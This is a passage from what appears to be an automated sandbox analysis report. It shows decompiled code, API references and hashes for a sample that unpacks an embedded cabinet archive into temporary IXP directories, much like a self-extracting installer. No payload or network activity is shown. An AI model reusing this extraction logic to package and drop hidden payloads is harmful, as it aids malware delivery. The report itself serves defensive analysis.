							_t105 =  *0xa09a38; // 0x0
							_t110 =  *((intOrPtr*)(0xa089e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xa089e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0xa09a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E00A044B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                            					 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                            					_t110 = 0x4f9;
                                                                                                                                                                                                                                            					goto L30;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t110 = 0x4bc;
                                                                                                                                                                                                                                            					E00A044B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            					_t66 = 0;
                                                                                                                                                                                                                                            					L33:
                                                                                                                                                                                                                                            					return E00A06CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}



































                                                                                                                                                                                                                                            0x00a05b8f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05b85
                                                                                                                                                                                                                                            0x00a05b29
                                                                                                                                                                                                                                            0x00a05b33
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05b35
                                                                                                                                                                                                                                            0x00a05b48
                                                                                                                                                                                                                                            0x00a05b4a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05b4a
                                                                                                                                                                                                                                            0x00a05b0f
                                                                                                                                                                                                                                            0x00a05b16
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05b16
                                                                                                                                                                                                                                            0x00a05a7c
                                                                                                                                                                                                                                            0x00a05a8a
                                                                                                                                                                                                                                            0x00a05aa5
                                                                                                                                                                                                                                            0x00a05aab
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a059bb
                                                                                                                                                                                                                                            0x00a059c0
                                                                                                                                                                                                                                            0x00a059c7
                                                                                                                                                                                                                                            0x00a059d1
                                                                                                                                                                                                                                            0x00a059d6
                                                                                                                                                                                                                                            0x00a05c05
                                                                                                                                                                                                                                            0x00a05c14
                                                                                                                                                                                                                                            0x00a05c14

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A059A8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(?), ref: 00A059AF
                                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00A05A13
                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,00000400), ref: 00A05A40
                                                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A05A64
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A05A7C
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A05A98
                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A05AA5
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00A05BFC
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A04518
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A04554
                                                                                                                                                                                                                                              • Part of subcall function 00A06285: GetLastError.KERNEL32(00A05BBC), ref: 00A06285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4237285672-0
                                                                                                                                                                                                                                            • Opcode ID: 033f2b3ef05af3c30883847f3e9e493d0e00dfe33f092b200e9603767f043160
                                                                                                                                                                                                                                            • Instruction ID: 4a7c76f299178f0f5e8f283762b4c38de564111f7fdc3997b3ebd94a23c5c8e4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 033f2b3ef05af3c30883847f3e9e493d0e00dfe33f092b200e9603767f043160
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E471A2B1E0060CAFEB25DF60ED85BFB77BCEB48344F0441A9F54592181EA349E868F60
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 374 a04fe0-a0501a call a0468f FindResourceA LoadResource LockResource 377 a05020-a05027 374->377 378 a05161-a05163 374->378 379 a05057-a0505e call a04efd 377->379 380 a05029-a05051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->380 383 a05060-a05077 call a044b9 379->383 384 a0507c-a050b4 379->384 380->379 388 a05107-a0510e 383->388 389 a050b6-a050da 384->389 390 a050e8-a05104 call a044b9 384->390 391 a05110-a05117 FreeResource 388->391 392 a0511d-a0511f 388->392 398 a05106 389->398 402 a050dc 389->402 390->398 391->392 394 a05121-a05127 392->394 395 a0513a-a05141 392->395 394->395 399 a05129-a05135 call a044b9 394->399 400 a05143-a0514a 395->400 401 a0515f 395->401 398->388 399->395 400->401 404 a0514c-a05159 SendMessageA 400->404 401->378 405 a050e3-a050e6 402->405 404->401 405->390 405->398
                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E00A04FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t9;
                                                                                                                                                                                                                                            				int _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            				struct HWND__* _t27;
                                                                                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                            				CHAR* _t36;
                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t36 = "CABINET";
                                                                                                                                                                                                                                            				 *0xa09144 = E00A0468F(_t36, 0, 0);
                                                                                                                                                                                                                                            				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                            				 *0xa09140 = _t8;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					return _t8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t9 =  *0xa08584; // 0x0
                                                                                                                                                                                                                                            				if(_t9 != 0) {
                                                                                                                                                                                                                                            					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                                                            					ShowWindow(GetDlgItem( *0xa08584, 0x841), 5); // executed
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t10 = E00A04EFD(0, 0); // executed
                                                                                                                                                                                                                                            				if(_t10 != 0) {
                                                                                                                                                                                                                                            					__imp__#20(E00A04CA0, E00A04CC0, E00A04980, E00A04A50, E00A04AD0, E00A04B60, E00A04BC0, 1, 0xa09148, _t33);
                                                                                                                                                                                                                                            					_t34 = _t10;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						_t29 =  *0xa09148; // 0x0
                                                                                                                                                                                                                                            						_t24 =  *0xa08584; // 0x0
                                                                                                                                                                                                                                            						E00A044B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__#22(_t34, "*MEMCAB", 0xa01140, 0, E00A04CD0, 0, 0xa09140); // executed
                                                                                                                                                                                                                                            					_t37 = _t10;
                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__#23(_t34); // executed
                                                                                                                                                                                                                                            					if(_t10 != 0) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 =  *0xa08584; // 0x0
                                                                                                                                                                                                                                            					E00A044B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t37 = 0;
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					_t12 =  *0xa09140; // 0x0
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						FreeResource(_t12);
                                                                                                                                                                                                                                            						 *0xa09140 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                            						_t47 =  *0xa091d8; // 0x0
                                                                                                                                                                                                                                            						if(_t47 == 0) {
                                                                                                                                                                                                                                            							E00A044B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(( *0xa08a38 & 0x00000001) == 0 && ( *0xa09a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            						SendMessageA( *0xa08584, 0xfa1, _t37, 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return _t37;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046A0
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: SizeofResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046A9
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046C3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LoadResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046CC
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LockResource.KERNEL32(00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046D3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: memcpy_s.MSVCRT ref: 00A046E5
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046EF
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00A04FFE
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00A05006
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 00A0500D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000000,00000842), ref: 00A05030
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00A05037
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000841,00000005), ref: 00A0504A
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00A05051
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00A05111
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00A05159
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                            • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                            • Opcode ID: 94fb6e5c80728db13ec56e51ca3e29069a31736de5c6942312f922ce7c7001c3
                                                                                                                                                                                                                                            • Instruction ID: cbbf12b1df3dae1348847fa5ce5122581e779734976b9c72a31a44a3606c5b6c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94fb6e5c80728db13ec56e51ca3e29069a31736de5c6942312f922ce7c7001c3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C431C9F0B4070EBBE710EBB1BD89F67365CB71C755F040624FA05A21E2DAB99C038A55
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A044B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                                            				char _v576;
                                                                                                                                                                                                                                            				void* _v580;
                                                                                                                                                                                                                                            				struct HWND__* _v584;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				signed int _t52;
                                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                                            				int _t64;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            				intOrPtr* _t73;
                                                                                                                                                                                                                                            				intOrPtr* _t76;
                                                                                                                                                                                                                                            				intOrPtr* _t77;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                                            				void* _t82;
                                                                                                                                                                                                                                            				intOrPtr* _t84;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				signed int _t89;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t75 = __edx;
                                                                                                                                                                                                                                            				_t34 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                            				_v584 = __ecx;
                                                                                                                                                                                                                                            				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                            				_t67 = _a4;
                                                                                                                                                                                                                                            				_t69 = 0xd;
                                                                                                                                                                                                                                            				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                            				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                            				_v580 = _t37;
                                                                                                                                                                                                                                            				asm("movsb");
                                                                                                                                                                                                                                            				if(( *0xa08a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            					_t39 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_v576 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0xa09a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                            					if(_v576 != 0) {
                                                                                                                                                                                                                                            						_t73 =  &_v576;
                                                                                                                                                                                                                                            						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                            						_t75 = _t16;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t43 =  *_t73;
                                                                                                                                                                                                                                            							_t73 = _t73 + 1;
                                                                                                                                                                                                                                            						} while (_t43 != 0);
                                                                                                                                                                                                                                            						_t84 = _v580;
                                                                                                                                                                                                                                            						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                            						if(_t84 == 0) {
                                                                                                                                                                                                                                            							if(_t67 == 0) {
                                                                                                                                                                                                                                            								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                            								_t83 = _t27;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t75 = _t83;
                                                                                                                                                                                                                                            									_t74 = _t80;
                                                                                                                                                                                                                                            									E00A01680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t76 = _t67;
                                                                                                                                                                                                                                            								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                            								_t85 = _t24;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t55 =  *_t76;
                                                                                                                                                                                                                                            									_t76 = _t76 + 1;
                                                                                                                                                                                                                                            								} while (_t55 != 0);
                                                                                                                                                                                                                                            								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                            								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00A0171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t77 = _t67;
                                                                                                                                                                                                                                            							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                            							_t81 = _t18;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t58 =  *_t77;
                                                                                                                                                                                                                                            								_t77 = _t77 + 1;
                                                                                                                                                                                                                                            							} while (_t58 != 0);
                                                                                                                                                                                                                                            							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                            							_t82 = _t84 + 1;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t59 =  *_t84;
                                                                                                                                                                                                                                            								_t84 = _t84 + 1;
                                                                                                                                                                                                                                            							} while (_t59 != 0);
                                                                                                                                                                                                                                            							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                            							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                            							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                            							_t80 = _t44;
                                                                                                                                                                                                                                            							if(_t80 == 0) {
                                                                                                                                                                                                                                            								goto L6;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_push(_v580);
                                                                                                                                                                                                                                            								E00A0171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            								L23:
                                                                                                                                                                                                                                            								MessageBeep(_a12);
                                                                                                                                                                                                                                            								if(E00A0681F(_t67) == 0) {
                                                                                                                                                                                                                                            									L25:
                                                                                                                                                                                                                                            									_t49 = 0x10000;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t54 = E00A067C9(_t74, _t74);
                                                                                                                                                                                                                                            									_t49 = 0x190000;
                                                                                                                                                                                                                                            									if(_t54 == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                                                            								_t83 = _t52;
                                                                                                                                                                                                                                            								LocalFree(_t80);
                                                                                                                                                                                                                                            								_t39 = _t52;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(E00A0681F(_t67) == 0) {
                                                                                                                                                                                                                                            							L4:
                                                                                                                                                                                                                                            							_t64 = 0x10010;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t66 = E00A067C9(0, 0);
                                                                                                                                                                                                                                            							_t64 = 0x190010;
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								goto L4;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                            			}



































                                                                                                                                                                                                                                            0x00a0466f
                                                                                                                                                                                                                                            0x00a04675
                                                                                                                                                                                                                                            0x00a04675
                                                                                                                                                                                                                                            0x00a045ad
                                                                                                                                                                                                                                            0x00a04527
                                                                                                                                                                                                                                            0x00a0452e
                                                                                                                                                                                                                                            0x00a0453f
                                                                                                                                                                                                                                            0x00a0453f
                                                                                                                                                                                                                                            0x00a04530
                                                                                                                                                                                                                                            0x00a04531
                                                                                                                                                                                                                                            0x00a04538
                                                                                                                                                                                                                                            0x00a0453d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0453d
                                                                                                                                                                                                                                            0x00a04554
                                                                                                                                                                                                                                            0x00a0455a
                                                                                                                                                                                                                                            0x00a0455a
                                                                                                                                                                                                                                            0x00a0455a
                                                                                                                                                                                                                                            0x00a04525
                                                                                                                                                                                                                                            0x00a0468c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A04518
                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A04554
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A045A3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A045E3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000002), ref: 00A0460D
                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00A04630
                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00A04666
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00A0466F
                                                                                                                                                                                                                                              • Part of subcall function 00A0681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A0686E
                                                                                                                                                                                                                                              • Part of subcall function 00A0681F: GetSystemMetrics.USER32(0000004A), ref: 00A068A7
                                                                                                                                                                                                                                              • Part of subcall function 00A0681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A068CC
                                                                                                                                                                                                                                              • Part of subcall function 00A0681F: RegQueryValueExA.ADVAPI32(?,00A01140,00000000,?,?,0000000C), ref: 00A068F4
                                                                                                                                                                                                                                              • Part of subcall function 00A0681F: RegCloseKey.ADVAPI32(?), ref: 00A06902
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                            • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                                                                                                                                                                                            • API String ID: 3244514340-1000497449
                                                                                                                                                                                                                                            • Opcode ID: 424c51729de7e8b001833de4a1c088d6cc2a2fa05bc2bef09f5bba5fcb5f93aa
                                                                                                                                                                                                                                            • Instruction ID: 3e262165d5456548daeb8fc6691dc785521b9d77097eaa12bb66806f6dc0b680
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 424c51729de7e8b001833de4a1c088d6cc2a2fa05bc2bef09f5bba5fcb5f93aa
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8151E8B190021DABDB21DF68ED48BA67B79FF49304F144194FE49A7281DB32ED06CB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 95%
E00A053A1(CHAR* __ecx, CHAR* __edx) {
    signed int _v8;
    char _v268;
    void* __ebx;
    void* __edi;
    void* __esi;
    signed int _t5;
    long _t13;
    int _t14;
    CHAR* _t20;
    int _t29;
    int _t30;
    CHAR* _t32;
    signed int _t33;
    void* _t34;

    _t5 = *0xa08004; // 0xe10713fe
    _v8 = _t5 ^ _t33;
    _t32 = __edx;
    _t20 = __ecx;
    _t29 = 0;
    while(1) {
        E00A0171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
        _t34 = _t34 + 0x10;
        _t29 = _t29 + 1;
        E00A01680(_t32, 0x104, _t20);
        E00A0658A(_t32, 0x104, &_v268); // executed
        RemoveDirectoryA(_t32); // executed
        _t13 = GetFileAttributesA(_t32); // executed
        if(_t13 == 0xffffffff) {
            break;
        }
        if(_t29 < 0x190) {
            continue;
        }
        L3:
        _t30 = 0;
        if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
            _t30 = 1;
            DeleteFileA(_t32);
            CreateDirectoryA(_t32, 0);
        }
        L5:
        return E00A06CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
    }
    _t14 = CreateDirectoryA(_t32, 0); // executed
    if(_t14 == 0) {
        goto L3;
    }
    _t30 = 1;
    *0xa08a20 = 1;
    goto L5;
}


















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A0171E: _vsnprintf.MSVCRT ref: 00A01750
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A053FB
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A05402
